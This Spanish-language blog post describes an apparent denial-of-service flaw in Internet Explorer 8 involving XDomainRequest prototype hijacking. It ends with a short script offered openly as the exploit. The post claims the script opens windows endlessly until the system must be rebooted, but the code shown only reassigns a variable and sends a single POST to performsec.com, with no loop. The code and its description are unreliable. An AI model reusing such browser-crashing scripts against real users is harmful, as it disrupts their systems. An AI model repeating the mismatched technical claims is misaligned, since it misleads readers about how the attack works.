Asi es, investigando sobre la meteria de este tipo de ataques DoS, nos llevo a hacía una herramienta de microsoft, el nuevo internet explorer 8, que si fuera poco despues de su mala entrada que ha causado entre los diseñadores y sus hojas de estilo, tambien viene dando guerra en el ámbito de la seguridad. Se trata de un secuestro de prototipos sobre el objeto de XDomainRequest, el encargado de llamar de las llamadas XML entre dominios.

Para explotar este ataque por ejemplo vamos abrir ventanas sobre PerformSec, lo que causamos es abrir una nueva ventana de ejecución en cuanto la ventana anterior se cuelga, esto nos lleva a quedarnos son recursos y tener que reiniciar el sistema para volver a la normalidad, ya que la ejecución de ventanas es infinita, esto es un suceso muy parecido cuando programamos sobre lenguaje JavaScript bluces infinitos, el escript para explotar esta vulnerabilidad es el siguiente:

<script>
xdr = XDomainRequest;
xdr = function() {
return new XDomainRequest();
}
ping = 'PerformSec';
xdr = new XDomainRequest();
xdr.open("POST", "http://performsec.com");
xdr.send(ping);
</script>